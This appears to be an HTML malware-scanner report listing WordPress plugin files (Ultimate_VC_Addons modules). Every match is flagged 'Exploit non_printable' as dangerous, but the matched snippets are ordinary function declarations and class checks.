<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Sticky Section Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_sticky_section_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sticky_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_452").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_tables.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_453" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Info_Table</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Info_Table' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Info_Table </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_VC_Addons_Info_Table</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Info Table assets</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_table_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate_VC_Addons_Info_Table</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_it_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_it_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_453").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_stats_counter.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_454" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Stats_Counter' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$aio_stats_counter </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Stats_Counter</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Stat_Counter' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCo</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Stats Counter Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Stats Counter module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Stats Counter Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_counter_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Stats Counter Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">counter_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 548</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Stats Counter Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">counter_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 780</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_454").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_interactive_banner_2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.69 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_455" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Interactive_Banner' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_interactive_banner </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Interactive_Banner</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Interactive_Banner_2'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_Info_Table</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Interactive Banner 2 assets</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_ib2_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 607</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_455").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_google_maps.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.59 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 20</span><br><table id="file_456" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Google_Maps</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Google_Map' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Google_Map </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Google Maps Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Google Maps module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Ultimate Google Maps Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_map_script</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Google Maps Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_ultimate_map</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Google Maps Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_maps_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
